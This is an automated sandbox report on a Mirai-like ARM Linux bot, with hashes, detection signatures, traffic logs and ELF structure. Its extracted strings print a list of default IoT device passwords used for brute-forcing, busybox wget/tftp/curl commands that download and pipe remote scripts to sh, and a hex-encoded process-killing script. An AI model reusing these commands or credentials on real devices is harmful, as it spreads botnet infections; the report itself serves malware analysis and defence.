Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
la.bot.arm7.elf

Overview

General Information

Sample name:la.bot.arm7.elf
Analysis ID:1543582
MD5:ec6dac700479efa7769724f40f57a068
SHA1:9af9576c353c01cee87e3dbde98e45546d38663e
SHA256:a9dacc3e5283886e67c83497f7fa4c273be6f86f83abe2f9d287d9d4574e471f
Tags:elfuser-abuse_ch
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1543582
Start date and time:2024-10-28 07:18:07 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 44s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:la.bot.arm7.elf
Detection:MAL
Classification:mal52.troj.linELF@0/0@0/0
  • VT rate limit hit for: la.bot.arm7.elf
Command:/tmp/la.bot.arm7.elf
PID:6240
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
thIs wEek on xLaB lEarNs nOthinG xd
Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
  • system is lnxubuntu20
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: la.bot.arm7.elfReversingLabs: Detection: 31%
Source: la.bot.arm7.elfString: ash|login|wget|curl|tftp|ntpdate|ftp
Source: la.bot.arm7.elfString: /proc//exe|ash|login|wget|curl|tftp|ntpdate|ftp/lib//lib64//mountinfo/fd/dev/null|/dev/consolesocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//bin//proc/net/tcp/proc/fd//proc/self/exe/. /proc/telnetd|upnpc-static|udhcpc|/usr/bin/inetd|ntpclient|boa|lighttpd|httpd|goahead|mini_http|miniupnpd|dnsmasq|sshd|dhcpd|upnpd|watchdog|syslogd|klogd|uhttpd|uchttpd|pppd|dhclient/dev/watchdog/dev/misc/watchdogM
Source: la.bot.arm7.elfString: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var/tmp//dev//dev/shm//etc//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x20\x27\x20\x3C""\x20\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x63\x6D\x64\x6C\x69\x6E\x65\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x23""\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x63\x6F\x6E\x74\x61\x69\x6E\x73\x20\x22\x64""\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x0A\x20\x20\x69\x66\x20\x65\x63\x68\x6F\x20\x22\x24\x63\x6D\x64\x6C\x69\x6E\x65\x22\x20\x7C\x20\x67\x72\x65\x70\x20\x2D""\x71\x20\x22\x64\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64""\x22\x0A\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4

Networking

barindex
Source: global trafficTCP traffic: 38.54.122.172 ports 1,2,5,6,7,27651
Source: global trafficTCP traffic: 192.168.2.23:40590 -> 38.54.122.172:27651
Source: /tmp/la.bot.arm7.elf (PID: 6240)Socket: 127.0.0.1:1234Jump to behavior
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 38.54.122.172
Source: unknownTCP traffic detected without corresponding DNS query: 38.54.122.172
Source: unknownTCP traffic detected without corresponding DNS query: 38.54.122.172
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 38.54.122.172
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownUDP traffic detected without corresponding DNS query: 116.203.104.203
Source: la.bot.arm7.elfString found in binary or memory: http:///curl.sh
Source: la.bot.arm7.elfString found in binary or memory: http:///wget.sh
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: Initial sampleString containing 'busybox' found: usage: busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname FICORA
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep
Source: Initial sampleString containing 'busybox' found: usage: busyboxincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > upnp
Source: Initial sampleString containing 'busybox' found: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORA/bin/busybox echo > .ri && sh .ri && cd .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrepwEek/var//var/run//var
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal52.troj.linELF@0/0@0/0
Source: /tmp/la.bot.arm7.elf (PID: 6240)File opened: /proc/11/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 6240)File opened: /proc/22/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 6240)File opened: /proc/66/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 6240)File opened: /proc/99/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 6240)File opened: /proc/111/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 6240)File opened: /proc/222/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 6240)File opened: /proc/333/mapsJump to behavior
Source: /tmp/la.bot.arm7.elf (PID: 6240)File opened: /proc/777/mapsJump to behavior
Source: submitted sampleStderr: qemu: uncaught target signal 11 (Segmentation fault) - core dumpedqemu: uncaught target signal 11 (Segmentation fault) - core dumped: exit code = 0
Source: /tmp/la.bot.arm7.elf (PID: 6240)Queries kernel information via 'uname': Jump to behavior
Source: la.bot.arm7.elf, 6240.1.000055c6f563f000.000055c6f578e000.rw-.sdmp, la.bot.arm7.elf, 6242.1.000055c6f563f000.000055c6f578e000.rw-.sdmp, la.bot.arm7.elf, 6244.1.000055c6f563f000.000055c6f578e000.rw-.sdmp, la.bot.arm7.elf, 6275.1.000055c6f563f000.000055c6f578e000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
Source: la.bot.arm7.elf, 6240.1.000055c6f563f000.000055c6f578e000.rw-.sdmp, la.bot.arm7.elf, 6242.1.000055c6f563f000.000055c6f578e000.rw-.sdmp, la.bot.arm7.elf, 6244.1.000055c6f563f000.000055c6f578e000.rw-.sdmp, la.bot.arm7.elf, 6275.1.000055c6f563f000.000055c6f578e000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: la.bot.arm7.elf, 6240.1.00007ffee78e6000.00007ffee7907000.rw-.sdmp, la.bot.arm7.elf, 6242.1.00007ffee78e6000.00007ffee7907000.rw-.sdmp, la.bot.arm7.elf, 6244.1.00007ffee78e6000.00007ffee7907000.rw-.sdmp, la.bot.arm7.elf, 6275.1.00007ffee78e6000.00007ffee7907000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: la.bot.arm7.elf, 6242.1.00007ffee78e6000.00007ffee7907000.rw-.sdmp, la.bot.arm7.elf, 6244.1.00007ffee78e6000.00007ffee7907000.rw-.sdmp, la.bot.arm7.elf, 6275.1.00007ffee78e6000.00007ffee7907000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: la.bot.arm7.elf, 6240.1.00007ffee78e6000.00007ffee7907000.rw-.sdmp, la.bot.arm7.elf, 6242.1.00007ffee78e6000.00007ffee7907000.rw-.sdmp, la.bot.arm7.elf, 6244.1.00007ffee78e6000.00007ffee7907000.rw-.sdmp, la.bot.arm7.elf, 6275.1.00007ffee78e6000.00007ffee7907000.rw-.sdmpBinary or memory string: c,x86_64/usr/bin/qemu-arm/tmp/la.bot.arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/la.bot.arm7.elf
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid AccountsWindows Management Instrumentation1
Scripting
Path InterceptionDirect Volume Access1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1543582 Sample: la.bot.arm7.elf Startdate: 28/10/2024 Architecture: LINUX Score: 52 18 38.54.122.172, 27651, 40590 COGENT-174US United States 2->18 20 109.202.202.202, 80 INIT7CH Switzerland 2->20 22 3 other IPs or domains 2->22 24 Multi AV Scanner detection for submitted file 2->24 26 Connects to many ports of the same IP (likely port scanning) 2->26 8 la.bot.arm7.elf 2->8         started        signatures3 process4 process5 10 la.bot.arm7.elf 8->10         started        12 la.bot.arm7.elf 8->12         started        14 la.bot.arm7.elf 8->14         started        process6 16 la.bot.arm7.elf 10->16         started       
SourceDetectionScannerLabelLink
la.bot.arm7.elf32%ReversingLabsLinux.Trojan.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
http:///wget.shla.bot.arm7.elffalse
    unknown
    http:///curl.shla.bot.arm7.elffalse
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      38.54.122.172
      unknownUnited States
      174COGENT-174UStrue
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      116.203.104.203
      unknownGermany
      24940HETZNER-ASDEfalse
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      38.54.122.172la.bot.arm7.elfGet hashmaliciousUnknownBrowse
        la.bot.arm7.elfGet hashmaliciousUnknownBrowse
          la.bot.arm7.elfGet hashmaliciousUnknownBrowse
            la.bot.arm7.elfGet hashmaliciousUnknownBrowse
              la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                  109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                  • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                  116.203.104.203la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                    la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                      la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                        la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                          la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                            na.elfGet hashmaliciousUnknownBrowse
                              na.elfGet hashmaliciousUnknownBrowse
                                na.elfGet hashmaliciousUnknownBrowse
                                  na.elfGet hashmaliciousUnknownBrowse
                                    na.elfGet hashmaliciousUnknownBrowse
                                      91.189.91.43arm7.elfGet hashmaliciousMiraiBrowse
                                        arm5.elfGet hashmaliciousMiraiBrowse
                                          mpsl.elfGet hashmaliciousMiraiBrowse
                                            ppc.elfGet hashmaliciousMiraiBrowse
                                              sshd.elfGet hashmaliciousUnknownBrowse
                                                spc.elfGet hashmaliciousMiraiBrowse
                                                  linux_mipsel.elfGet hashmaliciousChaosBrowse
                                                    linux_arm6.elfGet hashmaliciousChaosBrowse
                                                      sshd.elfGet hashmaliciousUnknownBrowse
                                                        111.out.elfGet hashmaliciousUnknownBrowse
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CANONICAL-ASGBarm7.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          arm5.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          mpsl.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          ppc.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          sshd.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          spc.elfGet hashmaliciousMiraiBrowse
                                                          • 91.189.91.42
                                                          linux_mipsel.elfGet hashmaliciousChaosBrowse
                                                          • 91.189.91.42
                                                          linux_arm6.elfGet hashmaliciousChaosBrowse
                                                          • 91.189.91.42
                                                          sshd.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          111.out.elfGet hashmaliciousUnknownBrowse
                                                          • 91.189.91.42
                                                          HETZNER-ASDECQlUZ4KuAa.exeGet hashmaliciousVidarBrowse
                                                          • 116.202.182.67
                                                          9yJSTTEg68.exeGet hashmaliciousVidarBrowse
                                                          • 135.181.31.18
                                                          dZIZhRHDXv.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                          • 138.201.226.224
                                                          nklmpsl.elfGet hashmaliciousUnknownBrowse
                                                          • 5.75.234.236
                                                          splppc.elfGet hashmaliciousUnknownBrowse
                                                          • 144.77.227.183
                                                          nabmpsl.elfGet hashmaliciousUnknownBrowse
                                                          • 78.46.37.121
                                                          nklmips.elfGet hashmaliciousUnknownBrowse
                                                          • 46.4.109.36
                                                          SecuriteInfo.com.Trojan.Agent.GMXD.11819.15970.exeGet hashmaliciousUnknownBrowse
                                                          • 95.217.6.16
                                                          la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                          • 136.243.215.170
                                                          http://www.wattpad.comGet hashmaliciousUnknownBrowse
                                                          • 148.251.20.73
                                                          INIT7CHarm7.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          arm5.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          mpsl.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          ppc.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          sshd.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          spc.elfGet hashmaliciousMiraiBrowse
                                                          • 109.202.202.202
                                                          linux_mipsel.elfGet hashmaliciousChaosBrowse
                                                          • 109.202.202.202
                                                          linux_arm6.elfGet hashmaliciousChaosBrowse
                                                          • 109.202.202.202
                                                          sshd.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          111.out.elfGet hashmaliciousUnknownBrowse
                                                          • 109.202.202.202
                                                          COGENT-174USla.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                          • 148.254.35.226
                                                          la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                          • 154.46.215.176
                                                          linux_arm6.elfGet hashmaliciousChaosBrowse
                                                          • 154.12.82.11
                                                          bin.sh.elfGet hashmaliciousMiraiBrowse
                                                          • 38.107.8.66
                                                          linux_arm5.elfGet hashmaliciousChaosBrowse
                                                          • 154.12.82.11
                                                          linux_arm7.elfGet hashmaliciousChaosBrowse
                                                          • 154.12.82.11
                                                          linux_ppc64el.elfGet hashmaliciousChaosBrowse
                                                          • 154.12.82.11
                                                          linux_ppc64.elfGet hashmaliciousChaosBrowse
                                                          • 154.12.82.11
                                                          linux_arm64.elfGet hashmaliciousChaosBrowse
                                                          • 154.12.82.11
                                                          linux_386.elfGet hashmaliciousChaosBrowse
                                                          • 154.12.82.11
                                                          No context
                                                          No context
                                                          No created / dropped files found
                                                          File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                          Entropy (8bit):6.03490498793463
                                                          TrID:
                                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                          File name:la.bot.arm7.elf
                                                          File size:100'032 bytes
                                                          MD5:ec6dac700479efa7769724f40f57a068
                                                          SHA1:9af9576c353c01cee87e3dbde98e45546d38663e
                                                          SHA256:a9dacc3e5283886e67c83497f7fa4c273be6f86f83abe2f9d287d9d4574e471f
                                                          SHA512:02f91bf33b02be5b6c3ae6a18104e72ff9310d1e8a474f1c794fb8b8fdb366fbe614d73842c101a4412d5acfca8ff2dd62c37da8e7920fd4b5212e252edee089
                                                          SSDEEP:3072:HEmX1/IUtbKXtGNdKjpY183xodW2hEgw6RTM9na:RX1/IUtSGj1rdW2hEgbRr
                                                          TLSH:CCA3E54AF8819A1AD5D816BEFE4F918D332367A8E3EF7203CD146B1437CA55B0A7B441
                                                          File Content Preview:.ELF..............(.........4...h.......4. ...(........p.|...........................................}...}...............................t..........................................Q.td..................................-...L..................@-.,@...0....S

                                                          ELF header

                                                          Class:ELF32
                                                          Data:2's complement, little endian
                                                          Version:1 (current)
                                                          Machine:ARM
                                                          Version Number:0x1
                                                          Type:EXEC (Executable file)
                                                          OS/ABI:UNIX - System V
                                                          ABI Version:0
                                                          Entry Point Address:0x8194
                                                          Flags:0x4000002
                                                          ELF Header Size:52
                                                          Program Header Offset:52
                                                          Program Header Size:32
                                                          Number of Program Headers:5
                                                          Section Header Offset:99432
                                                          Section Header Size:40
                                                          Number of Section Headers:15
                                                          Header String Table Index:14
                                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                          NULL0x00x00x00x00x0000
                                                          .initPROGBITS0x80d40xd40x100x00x6AX004
                                                          .textPROGBITS0x80f00xf00x15ba00x00x6AX0016
                                                          .finiPROGBITS0x1dc900x15c900x100x00x6AX004
                                                          .rodataPROGBITS0x1dca00x15ca00x1fc80x00x2A004
                                                          .ARM.extabPROGBITS0x1fc680x17c680x180x00x2A004
                                                          .ARM.exidxARM_EXIDX0x1fc800x17c800x1180x00x82AL204
                                                          .eh_framePROGBITS0x200000x180000x40x00x3WA004
                                                          .tbssNOBITS0x200040x180040x80x00x403WAT004
                                                          .init_arrayINIT_ARRAY0x200040x180040x40x00x3WA004
                                                          .fini_arrayFINI_ARRAY0x200080x180080x40x00x3WA004
                                                          .gotPROGBITS0x200100x180100xa80x40x3WA004
                                                          .dataPROGBITS0x200b80x180b80x33c0x00x3WA004
                                                          .bssNOBITS0x203f40x183f40x70240x00x3WA004
                                                          .shstrtabSTRTAB0x00x183f40x730x00x0001
                                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                          EXIDX0x17c800x1fc800x1fc800x1180x1184.47610x4R 0x4.ARM.exidx
                                                          LOAD0x00x80000x80000x17d980x17d986.07250x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                                          LOAD0x180000x200000x200000x3f40x74184.31970x6RW 0x8000.eh_frame .tbss .init_array .fini_array .got .data .bss
                                                          TLS0x180040x200040x200040x00x80.00000x4R 0x4.tbss
                                                          GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 28, 2024 07:18:55.101433039 CET43928443192.168.2.2391.189.91.42
                                                          Oct 28, 2024 07:18:56.270040989 CET4059027651192.168.2.2338.54.122.172
                                                          Oct 28, 2024 07:18:56.275407076 CET276514059038.54.122.172192.168.2.23
                                                          Oct 28, 2024 07:18:56.275585890 CET4059027651192.168.2.2338.54.122.172
                                                          Oct 28, 2024 07:18:56.283185005 CET4059027651192.168.2.2338.54.122.172
                                                          Oct 28, 2024 07:18:56.288486004 CET276514059038.54.122.172192.168.2.23
                                                          Oct 28, 2024 07:19:00.476744890 CET42836443192.168.2.2391.189.91.43
                                                          Oct 28, 2024 07:19:01.244671106 CET4251680192.168.2.23109.202.202.202
                                                          Oct 28, 2024 07:19:15.066786051 CET43928443192.168.2.2391.189.91.42
                                                          Oct 28, 2024 07:19:26.545818090 CET276514059038.54.122.172192.168.2.23
                                                          Oct 28, 2024 07:19:26.546001911 CET4059027651192.168.2.2338.54.122.172
                                                          Oct 28, 2024 07:19:27.353066921 CET42836443192.168.2.2391.189.91.43
                                                          Oct 28, 2024 07:19:31.448416948 CET4251680192.168.2.23109.202.202.202
                                                          Oct 28, 2024 07:19:56.021014929 CET43928443192.168.2.2391.189.91.42
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 28, 2024 07:18:55.506742954 CET485945353192.168.2.23116.203.104.203
                                                          Oct 28, 2024 07:18:56.255567074 CET535348594116.203.104.203192.168.2.23

                                                          System Behavior

                                                          Start time (UTC):06:18:54
                                                          Start date (UTC):28/10/2024
                                                          Path:/tmp/la.bot.arm7.elf
                                                          Arguments:/tmp/la.bot.arm7.elf
                                                          File size:4956856 bytes
                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                          Start time (UTC):06:18:54
                                                          Start date (UTC):28/10/2024
                                                          Path:/tmp/la.bot.arm7.elf
                                                          Arguments:-
                                                          File size:4956856 bytes
                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                          Start time (UTC):06:18:54
                                                          Start date (UTC):28/10/2024
                                                          Path:/tmp/la.bot.arm7.elf
                                                          Arguments:-
                                                          File size:4956856 bytes
                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                          Start time (UTC):06:18:54
                                                          Start date (UTC):28/10/2024
                                                          Path:/tmp/la.bot.arm7.elf
                                                          Arguments:-
                                                          File size:4956856 bytes
                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                          Start time (UTC):06:18:54
                                                          Start date (UTC):28/10/2024
                                                          Path:/tmp/la.bot.arm7.elf
                                                          Arguments:-
                                                          File size:4956856 bytes
                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1